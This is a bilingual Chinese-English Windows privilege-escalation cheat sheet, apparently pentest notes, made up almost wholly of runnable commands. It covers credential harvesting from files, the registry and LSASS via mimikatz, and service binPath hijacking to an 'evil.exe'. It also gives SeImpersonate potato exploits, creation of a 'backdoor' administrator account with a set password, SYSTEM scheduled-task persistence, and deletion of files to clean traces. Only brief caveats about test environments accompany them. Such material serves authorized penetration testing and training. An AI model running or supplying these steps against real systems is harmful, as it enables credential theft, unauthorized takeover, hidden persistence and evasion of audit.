本文介绍了Windows系统中的权限提升方法，涵盖了信息收集、凭据收集、服务与配置漏洞、自动运行与计划任务、提权特权、软件漏洞、注册表与权限问题、令牌与进程劫持、提权自动化工具以及持久化与清理等十个主要方面。每个部分列出了具体的命令和工具，帮助用户在测试环境中识别和利用潜在的安全漏洞，提升系统权限。建议在非生产环境中进行操作，以避免对系统造成风险。 This article introduces privilege escalation methods in Windows systems, covering ten main aspects: information gathering, credential collection, service and configuration vulnerabilities, autostart and scheduled tasks, escalation privileges, software vulnerabilities, registry and permission issues, token and process hijacking, privilege escalation automation tools, and persistence and cleanup. Each section lists specific commands and tools to help users identify and exploit potential security vulnerabilities in a testing environment to elevate system privileges. It is recommended to perform operations in non-production environments to avoid risks to the system.

使用说明：逐项执行命令，记录输出以分析提升路径。若需进一步工具（如PowerUp.ps1），可在PowerShell中加载执行。建议在测试环境中操作，避免生产系统风险。

🧭 一、信息收集阶段（Information Gathering）

whoami → 查看当前用户名和权限级别。

whoami /priv → 列出当前用户的特权（如 SeImpersonatePrivilege）。

hostname → 获取主机名以识别目标系统。

systeminfo → 查看操作系统版本、补丁与体系结构。

wmic qfe get Caption,Description,HotFixID,InstalledOn → 枚举已安装补丁，寻找未修复 CVE 线索。

set → 打印环境变量（如 TEMP、PATH、USERNAME 等）。

echo %USERNAME% && echo %USERDOMAIN% → 获取当前用户与域信息。

net users → 枚举本地用户账户。

net localgroup administrators → 列出本地管理员成员。

ipconfig /all → 网络接口、DNS 与网关信息。

route print → 路由表以识别潜在跳板/网段。

netstat -ano → 查看监听端口及对应 PID。

tasklist /svc → 列出运行进程及其服务映射。

wmic service list brief → 快速枚举服务状态与启动账户。

reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run → 查找开机自启项与可被滥用的路径。

⚙️ 二、凭据收集（Credential Harvesting）

cmdkey /list → 查看系统保存的凭据条目。

runas /savecred /user:Administrator cmd.exe → 测试是否可利用已保存凭据（若有的话）。

type %APPDATA%\\Microsoft\\Credentials\\* → 检查可能的凭据存储文件。

findstr /si password *.txt *.ini *.config → 在文件中搜索明文密码痕迹。

reg query HKLM /f password /t REG_SZ /s → 在注册表中搜索明文密码字段。

mimikatz.exe （sekurlsa::logonpasswords） → 从 LSASS 提取明文密码/哈希/票据（仅在授权范围内）。

🧱 三、服务与配置漏洞（Service Misconfiguration）

sc qc <service_name> → 查看服务二进制路径、启动账户与配置。

icacls "C:\\path\\to\\service.exe" → 检查服务可执行文件的文件权限写入情况。

sc config <service_name> binPath= "C:\\evil.exe" → 修改服务执行路径（需权限，常用于持久化）。

accesschk.exe -uws "Everyone" "C:\\Program Files\\..." → 检查可写目录与服务文件夹权限。

wmic service get name,startname,pathname → 批量列出服务及其启动主体与路径。

🧩 四、自动运行与计划任务（Autoruns / Scheduled Tasks）

schtasks /query /fo LIST /v → 枚举计划任务与调用命令。

icacls "C:\\path\\to\\task.exe" → 检查计划任务所调用程序的可修改性。

reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run → 用户级自启项枚举。

wmic startup get caption,command → 查看自动启动项与对应命令。

🧨 五、提权特权（Privilege Escalation Primitives）

whoami /priv → 确认是否存在高危特权（SeImpersonate, SeAssignPrimaryToken 等）。

PrintSpoofer.exe -i -c cmd → 利用 SeImpersonatePrivilege（若存在）尝试提权。

JuicyPotato.exe -t * -p cmd.exe -l 1337 → 通过 RPC/COM 提权（针对老系统/不当配置）。

GodPotato.exe -cmd "cmd.exe" → 新版系统可用的提权尝试（视环境而定）。

🧰 六、软件漏洞（Software Exploitation）

wmic product get name,version → 列出已安装程序与版本以对照漏洞库。

dir "C:\\Program Files" → 人工识别可能不安全的第三方软件。

findstr /si "install" *.log *.txt → 在安装日志中查找泄露的凭据或路径信息。

使用 CVE/ExploitDB/厂商公告进行版本-漏洞匹配 → 将已知漏洞转化为可执行利用链。

🗝️ 七、注册表与权限问题（Registry Abuse）

reg query HKLM\\System\\CurrentControlSet\\Services → 查找可被修改的服务注册表项。

icacls C:\\Windows\\System32 → 检查关键系统目录的权限异常。

reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System → 检查 UAC / 策略配置。

reg query HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon → 检查 AutoAdminLogon 等自动登录配置。

🕵️ 八、令牌与进程劫持（Token & Process Hijacking）

whoami /groups → 查看当前用户所属组与可用令牌。

tasklist /fi "username eq SYSTEM" → 查找 SYSTEM 级进程以评估令牌偷取机会。

psexec.exe -s cmd.exe → 使用 PsTools 在本机以 SYSTEM 权限运行命令（需可执行权限）。

使用 Process Explorer 进行可视化令牌/句柄分析 → 查找可借用的进程令牌。

🧿 九、提权自动化工具（Automation Tools）

winPEASx64.exe → 自动化枚举潜在提权向量与 misconfig。

Seatbelt.exe → 快速收集系统安全与配置信息。

PowerUp.ps1 → PowerShell 脚本化的提权检查。

SharpUp.exe → C# 版提权检查，适合红队/内网场景。

PrivescCheck.ps1 → 全面 PowerShell 提权扫描。

🔥 十、持久化与清理（Persistence & Cleanup）

net user backdoor P@ssw0rd /add → 创建备用用户（注意合规与授权）。

net localgroup administrators backdoor /add → 将后门用户加入管理员组。

schtasks /create /tn "UpdateCheck" /tr "cmd.exe /c whoami > C:\\proof.txt" /sc onlogon /ru SYSTEM → 以 SYSTEM 权限创建持久计划任务。

del /f /q C:\\Windows\\Temp\\* → 清理痕迹（谨慎操作，记录审计行为）。

Usage Instructions: Execute commands sequentially, record outputs to analyze privilege escalation paths. If further tools (e.g., PowerUp.ps1) are needed, load and execute them in PowerShell. It is recommended to operate in a test environment to avoid risks to production systems.

🧭 I. Information Gathering Phase

whoami → View current username and privilege level.

whoami /priv → List current user's privileges (e.g., SeImpersonatePrivilege).

hostname → Obtain hostname to identify the target system.

systeminfo → View OS version, patches, and architecture.

wmic qfe get Caption,Description,HotFixID,InstalledOn → Enumerate installed patches to find unpatched CVE clues.

set → Print environment variables (e.g., TEMP, PATH, USERNAME, etc.).

echo %USERNAME% && echo %USERDOMAIN% → Obtain current user and domain information.

net users → Enumerate local user accounts.

net localgroup administrators → List local administrator members.

ipconfig /all → Network interfaces, DNS, and gateway information.

route print → Routing table to identify potential jump hosts/segments.

netstat -ano → View listening ports and corresponding PIDs.

tasklist /svc → List running processes and their service mappings.

wmic service list brief → Quickly enumerate service status and startup accounts.

reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run → Find auto-start items and paths that can be abused.

⚙️ II. Credential Harvesting

cmdkey /list → View saved credential entries on the system.

runas /savecred /user:Administrator cmd.exe → Test if saved credentials can be exploited (if available).

type %APPDATA%\\Microsoft\\Credentials\\* → Check possible credential storage files.

findstr /si password *.txt *.ini *.config → Search for plaintext password traces in files.

reg query HKLM /f password /t REG_SZ /s → Search for plaintext password fields in the registry.

mimikatz.exe （sekurlsa::logonpasswords） → Extract plaintext passwords/hashes/tickets from LSASS (only within authorized scope).

🧱 III. Service Misconfiguration

sc qc <service_name> → View service binary path, startup account, and configuration.

icacls "C:\\path\\to\\service.exe" → Check file permissions write access for service executable files.

sc config <service_name> binPath= "C:\\evil.exe" → Modify service execution path (requires privileges, commonly used for persistence).

accesschk.exe -uws "Everyone" "C:\\Program Files\\..." → Check writable directories and service folder permissions.

wmic service get name,startname,pathname → Bulk list services, their startup entities, and paths.

🧩 IV. Autoruns / Scheduled Tasks

schtasks /query /fo LIST /v → Enumerate scheduled tasks and invoked commands.

icacls "C:\\path\\to\\task.exe" → Check modifiability of programs invoked by scheduled tasks.

reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run → User-level auto-start items enumeration.

wmic startup get caption,command → View auto-start items and corresponding commands.

🧨 V. Privilege Escalation Primitives

whoami /priv → Confirm if high-risk privileges exist (e.g., SeImpersonate, SeAssignPrimaryToken).

PrintSpoofer.exe -i -c cmd → Attempt privilege escalation using SeImpersonatePrivilege (if present).

JuicyPotato.exe -t * -p cmd.exe -l 1337 → Escalate via RPC/COM (for older systems/misconfigurations).

GodPotato.exe -cmd "cmd.exe" → Privilege escalation attempt available for newer systems (depending on environment).

🧰 VI. Software Exploitation

wmic product get name,version → List installed programs and versions to cross-reference with vulnerability databases.

dir "C:\\Program Files" → Manually identify potentially insecure third-party software.

findstr /si "install" *.log *.txt → Search installation logs for leaked credentials or path information.

使用 CVE/ExploitDB/厂商公告进行版本-漏洞匹配 → Use CVE/ExploitDB/vendor advisories to perform version-vulnerability matching.

将已知漏洞转化为可执行利用链。 → Convert known vulnerabilities into executable exploit chains.

🗝️ VII. Registry Abuse

reg query HKLM\\System\\CurrentControlSet\\Services → Find service registry keys that can be modified.

icacls C:\\Windows\\System32 → Check for permission anomalies in critical system directories.

reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System → Check UAC/policy configurations.

reg query HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon → Check auto-login configurations such as AutoAdminLogon.

🕵️ VIII. Token & Process Hijacking

whoami /groups → View current user's group memberships and available tokens.

tasklist /fi "username eq SYSTEM" → Find SYSTEM-level processes to assess token theft opportunities.

psexec.exe -s cmd.exe → Use PsTools to run commands locally with SYSTEM privileges (requires executable permissions).

使用 Process Explorer 进行可视化令牌/句柄分析 → Use Process Explorer for visual token/handle analysis.

🧿 IX. Automation Tools

winPEASx64.exe → Automatically enumerate potential privilege escalation vectors and misconfigurations.

Seatbelt.exe → Quickly gather system security and configuration information.

PowerUp.ps1 → PowerShell-scripted privilege escalation checks.

SharpUp.exe → C# version of privilege escalation checks, suitable for red team/internal network scenarios.

PrivescCheck.ps1 → Comprehensive PowerShell privilege escalation scan.

🔥 Ten, Persistence & Cleanup

net user backdoor P@ssw0rd /add → Create a backdoor user (note compliance and authorization).

net localgroup administrators backdoor /add → Add the backdoor user to the administrators group.

schtasks /create /tn "UpdateCheck" /tr "cmd.exe /c whoami > C:\\proof.txt" /sc onlogon /ru SYSTEM → Create a persistent scheduled task with SYSTEM privileges.

del /f /q C:\\Windows\\Temp\\* → Clean up traces (operate with caution, record audit actions).